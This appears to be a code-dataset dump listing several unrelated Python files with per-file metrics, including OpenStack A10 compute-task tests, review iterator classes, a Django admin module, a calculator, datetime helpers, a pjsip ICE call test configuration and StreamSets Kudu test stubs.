    self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
                     amp_license_network=license_net)
    create_task = task.ComputeCreate()
    create_task.compute = mock.MagicMock()
    create_task.execute(AMPHORA.id, loadbalancer=LB, network_list=requested_nets)
    _, build_kwargs = create_task.compute.build.call_args
    passed_nets = build_kwargs.get('network_ids')
    self.assertEqual(passed_nets[0], mgmt_net)
    self.assertEqual(set(passed_nets), set(requested_nets))
    self.assertEqual(len(passed_nets), len(requested_nets))
@mock.patch('stevedore.driver.DriverManager.driver')
def test_ComputeCreate_execute_net_list_with_diff(self, mock_driver):
    """network_list missing some configured networks: ComputeCreate is
    expected to union in the missing boot and VIP networks.
    """
    mgmt_id = 'mock-mgmt-net-id'
    license_id = 'mock-mock-license-net-id'
    boot_list = ['mock-data-net-id-1', 'mock-data-net-id-2']
    # net_list deliberately omits boot_list[1] and the LB VIP network.
    net_list = [mgmt_id, boot_list[0], license_id]
    self.conf.config(group=a10constants.A10_CONTROLLER_WORKER_CONF_SECTION,
                     amp_mgmt_network=mgmt_id,
                     amp_boot_network_list=boot_list)
    self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
                     amp_license_network=license_id)
    compute_task = task.ComputeCreate()
    compute_task.compute = mock.MagicMock()
    compute_task.execute(AMPHORA.id, loadbalancer=LB, network_list=net_list)
    args, kwargs = compute_task.compute.build.call_args
    actual_net_ids = kwargs.get('network_ids')
    expected_net_ids = {mgmt_id, license_id, LB.vip.network_id}.union(boot_list)
    self.assertEqual(actual_net_ids[0], mgmt_id)
    # Result must be strictly larger than the caller-supplied list ...
    self.assertNotEqual(set(actual_net_ids), set(net_list))
    self.assertNotEqual(len(actual_net_ids), len(net_list))
    # ... and exactly the union of everything configured plus the VIP.
    self.assertEqual(set(actual_net_ids), expected_net_ids)
    self.assertEqual(len(actual_net_ids), len(expected_net_ids))
@mock.patch('stevedore.driver.DriverManager.driver')
def test_CheckAmphoraStatus_execute_status_active(self, mock_driver):
    """CheckAmphoraStatus.execute returns True for an ACTIVE amphora."""
    amphora = mock.MagicMock()
    amphora.status = o_constants.ACTIVE
    mock_driver.get_amphora.return_value = (amphora, None)
    vthunder = copy.deepcopy(VTHUNDER)
    check_task = task.CheckAmphoraStatus()
    self.assertEqual(check_task.execute(vthunder), True)
@mock.patch('stevedore.driver.DriverManager.driver')
def test_CheckAmphoraStatus_status_execute_shutoff(self, mock_driver):
    """CheckAmphoraStatus.execute returns False for a SHUTOFF amphora."""
    amphora = mock.MagicMock()
    amphora.status = "SHUTOFF"
    mock_driver.get_amphora.return_value = (amphora, None)
    vthunder = copy.deepcopy(VTHUNDER)
    check_task = task.CheckAmphoraStatus()
    self.assertEqual(check_task.execute(vthunder), False)
| 47.165254 | 90 | 0.715749 | 1,397 | 11,131 | 5.400859 | 0.120974 | 0.064148 | 0.052485 | 0.045726 | 0.761166 | 0.719682 | 0.709476 | 0.69609 | 0.688403 | 0.656991 | 0 | 0.014581 | 0.192885 | 11,131 | 235 | 91 | 47.365957 | 0.825245 | 0.051927 | 0 | 0.582888 | 0 | 0 | 0.082954 | 0.057232 | 0 | 0 | 0 | 0 | 0.112299 | 1 | 0.080214 | false | 0 | 0.080214 | 0 | 0.165775 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
d7509c4cd50a2e3c40de876c849306de353c8796 | 1,617 | py | Python | tb/sources/review_list.py | DronMDF/manabot | b412e8cb9b5247f05487bed4cbf4967f7b58327f | [
"MIT"
] | 1 | 2017-11-29T11:51:12.000Z | 2017-11-29T11:51:12.000Z | tb/sources/review_list.py | DronMDF/manabot | b412e8cb9b5247f05487bed4cbf4967f7b58327f | [
"MIT"
] | 109 | 2017-11-28T20:51:59.000Z | 2018-02-02T13:15:29.000Z | tb/sources/review_list.py | DronMDF/manabot | b412e8cb9b5247f05487bed4cbf4967f7b58327f | [
"MIT"
] | null | null | null | from .review import Review, UpdateableReview
class ReviewUnderControl:
    """Every record stored in *db*, wrapped as a Review object."""

    def __init__(self, db):
        self.db = db

    def __iter__(self):
        records = self.db.all()
        return map(Review, records)
class ReviewIds:
    """The ``id`` field of every review in the wrapped collection."""

    def __init__(self, reviews):
        self.reviews = reviews

    def __iter__(self):
        return map(lambda review: review['id'], self.reviews)
class ReviewVerified:
    """Only the reviews whose ``verify`` field is truthy."""

    def __init__(self, reviews):
        self.reviews = reviews

    def __iter__(self):
        return filter(lambda review: review['verify'], self.reviews)
class ReviewIgnored:
    """Only the reviews whose ``status`` field equals 'ignore'."""

    def __init__(self, reviews):
        self.reviews = reviews

    def __iter__(self):
        return filter(lambda review: review['status'] == 'ignore', self.reviews)
class ReviewOne:
    """At most the first review of the wrapped collection.

    Fix: the previous implementation called ``next(iter(self.reviews))``
    unconditionally, so an empty collection leaked a StopIteration out of
    ``__iter__``.  Now an empty input simply iterates as empty.
    """

    def __init__(self, reviews):
        self.reviews = reviews

    def __iter__(self):
        for review in self.reviews:
            # Stop after the first element.
            return iter([review])
        return iter([])
class ReviewIsNeed:
    """Yields new reviews only while ``current`` is empty."""

    def __init__(self, current, reviews):
        self.current = current
        self.reviews = reviews

    def __iter__(self):
        # If there is already something in current, no new reviews are needed.
        if list(self.current):
            return iter([])
        return iter(self.reviews)
class ReviewDifference:
    """Reviews whose id does not appear in the ``others`` collection."""

    def __init__(self, reviews, others):
        self.reviews = reviews
        self.others = others

    def __iter__(self):
        known = {other['id'] for other in self.others}
        for review in self.reviews:
            if review['id'] not in known:
                yield review
class ReviewForUpdate:
    """External reviews that already exist locally and need updating."""

    def __init__(self, extern, exists):
        self.extern = extern
        self.exists = exists

    def updateable(self):
        """Pair every external review with its locally known counterpart."""
        local = {record['id']: record for record in self.exists}
        for record in self.extern:
            if record['id'] in local:
                yield UpdateableReview(local[record['id']], record)

    def __iter__(self):
        return (review for review in self.updateable() if review.needUpdate())
| 20.468354 | 62 | 0.698207 | 239 | 1,617 | 4.435146 | 0.200837 | 0.176415 | 0.083019 | 0.075472 | 0.370755 | 0.360377 | 0.333019 | 0.333019 | 0.333019 | 0.239623 | 0 | 0 | 0.1812 | 1,617 | 78 | 63 | 20.730769 | 0.800604 | 0.026592 | 0 | 0.346154 | 0 | 0 | 0.019084 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.326923 | false | 0 | 0.019231 | 0.134615 | 0.673077 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
d76ffeea7a15f6cc88a78023f7f989729b0cc99f | 590 | py | Python | finance/admin.py | webclinic017/invertimo | 125995b2f04a0b8cf3fe98df38f2a4f15cf8399b | [
"MIT"
] | null | null | null | finance/admin.py | webclinic017/invertimo | 125995b2f04a0b8cf3fe98df38f2a4f15cf8399b | [
"MIT"
] | null | null | null | finance/admin.py | webclinic017/invertimo | 125995b2f04a0b8cf3fe98df38f2a4f15cf8399b | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import (
Account,
AccountEvent,
Exchange,
ExchangeIdentifier,
Position,
Asset,
Transaction,
TransactionImport,
TransactionImportRecord,
EventImportRecord,
)
# Expose the finance models in the Django admin, in declaration order.
for _model in (
    Account,
    AccountEvent,
    Exchange,
    ExchangeIdentifier,
    Position,
    Asset,
    Transaction,
    TransactionImport,
    TransactionImportRecord,
):
    admin.site.register(_model)
admin.site.register(EventImportRecord) | 23.6 | 44 | 0.789831 | 58 | 590 | 8.034483 | 0.310345 | 0.193133 | 0.364807 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.118644 | 590 | 25 | 45 | 23.6 | 0.896154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.347826 | 0 | 0.347826 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
d77337fd84c4c07ea01cd56645d3106d6df8a173 | 995 | py | Python | Calculator/calculator.py | harshalupadhye/statistic | 33d9fa183e6268f97c2394d8134f1e3fc2efc2c0 | [
"MIT"
] | null | null | null | Calculator/calculator.py | harshalupadhye/statistic | 33d9fa183e6268f97c2394d8134f1e3fc2efc2c0 | [
"MIT"
] | null | null | null | Calculator/calculator.py | harshalupadhye/statistic | 33d9fa183e6268f97c2394d8134f1e3fc2efc2c0 | [
"MIT"
] | 1 | 2019-11-17T04:15:50.000Z | 2019-11-17T04:15:50.000Z | from Calculator.addition import addition
from Calculator.subtraction import subtraction
from Calculator.multiplication import multiplication
from Calculator.division import division
from Calculator.square import square
from Calculator.squareroot import squareroot
class Calculator:
    """Facade over the arithmetic helper modules.

    Each operation stores its outcome in ``self.result`` and returns it.
    """

    # Most recent result; 0 before any operation has run.
    result = 0

    def __init__(self):
        pass

    def add(self, a, b):
        """Sum of a and b."""
        value = addition(a, b)
        self.result = value
        return value

    def subtract(self, a, b):
        """Difference a - b."""
        value = subtraction(a, b)
        self.result = value
        return value

    def multiply(self, a, b):
        """Product of a and b."""
        value = multiplication(a, b)
        self.result = value
        return value

    def divide(self, a, b):
        """Quotient a / b, reported rounded to 7 decimal places."""
        self.result = division(a, b)
        return round(float(self.result), 7)

    def squaring(self, a):
        """Square of a."""
        value = square(a)
        self.result = value
        return value

    def square_rt(self, a):
        """Square root of a, reported rounded to 7 decimal places."""
        self.result = squareroot(a)
        return round(float(self.result), 7)

    def variance_sample_proportion(self, my_pop):
        # Not implemented yet.
        pass
d773f97269fd60411607bf463a80a62ce933da50 | 459 | py | Python | platform_disk_api/utils.py | neuro-inc/platform-disk-api | ccba10ac99032a59d456b559a2f1d22e5787c52b | [
"Apache-2.0"
] | null | null | null | platform_disk_api/utils.py | neuro-inc/platform-disk-api | ccba10ac99032a59d456b559a2f1d22e5787c52b | [
"Apache-2.0"
] | 6 | 2022-01-17T03:11:20.000Z | 2022-03-25T03:17:47.000Z | platform_disk_api/utils.py | neuro-inc/platform-disk-api | ccba10ac99032a59d456b559a2f1d22e5787c52b | [
"Apache-2.0"
] | null | null | null | from datetime import datetime, timedelta, timezone
def utc_now() -> datetime:
    """Return the current moment as a timezone-aware UTC datetime."""
    return datetime.now(tz=timezone.utc)
def datetime_dump(dt: datetime) -> str:
    """Serialize *dt* as its POSIX timestamp rendered as a string."""
    timestamp = dt.timestamp()
    return str(timestamp)
def datetime_load(raw: str) -> datetime:
    """Parse a stringified POSIX timestamp into an aware UTC datetime."""
    seconds = float(raw)
    return datetime.fromtimestamp(seconds, tz=timezone.utc)
def timedelta_dump(td: timedelta) -> str:
    """Serialize *td* as its total number of seconds rendered as a string."""
    seconds = td.total_seconds()
    return str(seconds)
def timedelta_load(raw: str) -> timedelta:
    """Parse a stringified seconds count back into a timedelta."""
    seconds = float(raw)
    return timedelta(seconds=seconds)
| 20.863636 | 59 | 0.721133 | 60 | 459 | 5.416667 | 0.333333 | 0.086154 | 0.135385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.154684 | 459 | 21 | 60 | 21.857143 | 0.837629 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.454545 | false | 0 | 0.090909 | 0.454545 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
d784141a178bcf68f4981b370e10b1ab73e229b3 | 67 | py | Python | python/testData/codeInsight/mlcompletion/sameColumnKeywords1.py | tgodzik/intellij-community | f5ef4191fc30b69db945633951fb160c1cfb7b6f | [
"Apache-2.0"
] | 2 | 2019-04-28T07:48:50.000Z | 2020-12-11T14:18:08.000Z | python/testData/codeInsight/mlcompletion/sameColumnKeywords1.py | tgodzik/intellij-community | f5ef4191fc30b69db945633951fb160c1cfb7b6f | [
"Apache-2.0"
] | 2 | 2022-02-19T09:45:05.000Z | 2022-02-27T20:32:55.000Z | python/testData/codeInsight/mlcompletion/sameColumnKeywords1.py | tgodzik/intellij-community | f5ef4191fc30b69db945633951fb160c1cfb7b6f | [
"Apache-2.0"
] | 2 | 2020-03-15T08:57:37.000Z | 2020-04-07T04:48:14.000Z | a, b = 2, 3
if a > b:
print(a)
elif a * 2 > b:
print(b)
<caret> | 11.166667 | 15 | 0.477612 | 16 | 67 | 2 | 0.5 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.065217 | 0.313433 | 67 | 6 | 16 | 11.166667 | 0.630435 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.333333 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
d78992c8ec504fe49a791b1a16ea4fc7df9cbd5d | 1,058 | py | Python | pjsip/tests/pjsua/scripts-call/301_ice_public_b.py | tomorrow-rain/pjsip | 776e032c4ee2672cd42b8c665021b1310181d126 | [
"MIT"
] | null | null | null | pjsip/tests/pjsua/scripts-call/301_ice_public_b.py | tomorrow-rain/pjsip | 776e032c4ee2672cd42b8c665021b1310181d126 | [
"MIT"
] | null | null | null | pjsip/tests/pjsua/scripts-call/301_ice_public_b.py | tomorrow-rain/pjsip | 776e032c4ee2672cd42b8c665021b1310181d126 | [
"MIT"
] | null | null | null | # $Id$
#
from inc_cfg import *
# This test:
# makes a call with ICE enabled but without a STUN server.
# Note:
# - need --dis-codec to make INVITE packet less than typical MTU
def _build_endpoint_args(user, log_name):
    # The callee and caller command lines are identical except for the
    # account (test1/test2) and the log file name; build them from one
    # template instead of maintaining two near-duplicate strings.
    return (
        "--null-audio --id=\"<sip:%s@pjsip.org>\" "
        "--registrar=sip:sip.pjsip.org "
        "--username=%s --password=%s --realm=pjsip.org "
        "--proxy=\"sip:sip.pjsip.org;lr\" "
        "--rtp-port 0 --use-ice --use-compact-form --max-calls 1 "
        "--dis-codec=i --dis-codec=s --dis-codec=g "
        "--log-file %s.log" % (user, user, user, log_name))

uas_args = _build_endpoint_args("test1", "callee")
uac_args = _build_endpoint_args("test2", "caller")
# One registered callee/caller pair; both endpoints register
# (have_reg=True) but neither publishes presence (have_publish=False).
test_param = TestParam(
    "ICE via public internet with no STUN",
    [
        InstanceParam("callee", uas_args,
                      uri="<sip:test1@pjsip.org>",
                      have_reg=True, have_publish=False),
        InstanceParam("caller", uac_args,
                      uri="<sip:test2@pjsip.org>",
                      have_reg=True, have_publish=False),
    ]
)
| 40.692308 | 294 | 0.666352 | 169 | 1,058 | 4.112426 | 0.414201 | 0.115108 | 0.063309 | 0.080576 | 0.566906 | 0.515108 | 0.515108 | 0.515108 | 0.302158 | 0.302158 | 0 | 0.013115 | 0.135161 | 1,058 | 25 | 295 | 42.32 | 0.746448 | 0.119093 | 0 | 0.142857 | 0 | 0.285714 | 0.600649 | 0.108225 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.142857 | 0.071429 | 0 | 0.071429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
ad2b7d7e1f92e87ee35dd4bcf57b7d783c28c486 | 2,674 | py | Python | stage/configuration/test_kudu_destination.py | Sentienz/datacollector-tests | ca27988351dc3366488098b5db6c85a8be2f7b85 | [
"Apache-2.0"
] | null | null | null | stage/configuration/test_kudu_destination.py | Sentienz/datacollector-tests | ca27988351dc3366488098b5db6c85a8be2f7b85 | [
"Apache-2.0"
] | 1 | 2019-04-24T11:06:38.000Z | 2019-04-24T11:06:38.000Z | stage/configuration/test_kudu_destination.py | anubandhan/datacollector-tests | 301c024c66d68353735256b262b681dd05ba16cc | [
"Apache-2.0"
] | 2 | 2019-05-24T06:34:37.000Z | 2020-03-30T11:48:18.000Z | import pytest
from streamsets.testframework.decorators import stub
@stub
def test_admin_operation_timeout_in_milliseconds(sdc_builder, sdc_executor):
    """Stub: 'Admin Operation Timeout (ms)' config not yet exercised."""
    pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'change_log_format': 'MSSQL'},
                                              {'change_log_format': 'MongoDBOpLog'},
                                              {'change_log_format': 'MySQLBinLog'},
                                              {'change_log_format': 'NONE'},
                                              {'change_log_format': 'OracleCDC'}])
def test_change_log_format(sdc_builder, sdc_executor, stage_attributes):
    """Stub: one case per supported 'Change Log Format' value."""
    pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'default_operation': 'DELETE'},
                                              {'default_operation': 'INSERT'},
                                              {'default_operation': 'UPDATE'},
                                              {'default_operation': 'UPSERT'}])
def test_default_operation(sdc_builder, sdc_executor, stage_attributes):
    """Stub: one case per supported 'Default Operation' value."""
    pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'external_consistency': 'CLIENT_PROPAGATED'},
                                              {'external_consistency': 'COMMIT_WAIT'}])
def test_external_consistency(sdc_builder, sdc_executor, stage_attributes):
    """Stub: one case per 'External Consistency' mode."""
    pass
@stub
def test_field_to_column_mapping(sdc_builder, sdc_executor):
    """Stub: 'Field to Column Mapping' config not yet exercised."""
    pass
@stub
def test_kudu_masters(sdc_builder, sdc_executor):
    """Stub: 'Kudu Masters' config not yet exercised."""
    pass
@stub
def test_maximum_number_of_worker_threads(sdc_builder, sdc_executor):
    """Stub: 'Maximum Number of Worker Threads' config not yet exercised."""
    pass
@stub
def test_mutation_buffer_space_in_records(sdc_builder, sdc_executor):
    """Stub: 'Mutation Buffer Space (records)' config not yet exercised."""
    pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'on_record_error': 'DISCARD'},
                                              {'on_record_error': 'STOP_PIPELINE'},
                                              {'on_record_error': 'TO_ERROR'}])
def test_on_record_error(sdc_builder, sdc_executor, stage_attributes):
    """Stub: one case per 'On Record Error' policy."""
    pass
@stub
def test_operation_timeout_in_milliseconds(sdc_builder, sdc_executor):
    """Stub: 'Operation Timeout (ms)' config not yet exercised."""
    pass
@stub
def test_preconditions(sdc_builder, sdc_executor):
    """Stub: record 'Preconditions' config not yet exercised."""
    pass
@stub
def test_required_fields(sdc_builder, sdc_executor):
    """Stub: 'Required Fields' config not yet exercised."""
    pass
@stub
def test_table_name(sdc_builder, sdc_executor):
    """Stub: 'Table Name' config not yet exercised."""
    pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'unsupported_operation_handling': 'DISCARD'},
                                              {'unsupported_operation_handling': 'SEND_TO_ERROR'},
                                              {'unsupported_operation_handling': 'USE_DEFAULT'}])
def test_unsupported_operation_handling(sdc_builder, sdc_executor, stage_attributes):
    """Stub: one case per 'Unsupported Operation Handling' policy."""
    pass
| 29.065217 | 98 | 0.620045 | 267 | 2,674 | 5.775281 | 0.265918 | 0.063554 | 0.118029 | 0.190661 | 0.501297 | 0.501297 | 0.501297 | 0.475357 | 0.354086 | 0.354086 | 0 | 0 | 0.28347 | 2,674 | 91 | 99 | 29.384615 | 0.804802 | 0 | 0 | 0.459016 | 0 | 0 | 0.209502 | 0.03367 | 0 | 0 | 0 | 0 | 0 | 1 | 0.229508 | false | 0.229508 | 0.032787 | 0 | 0.262295 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.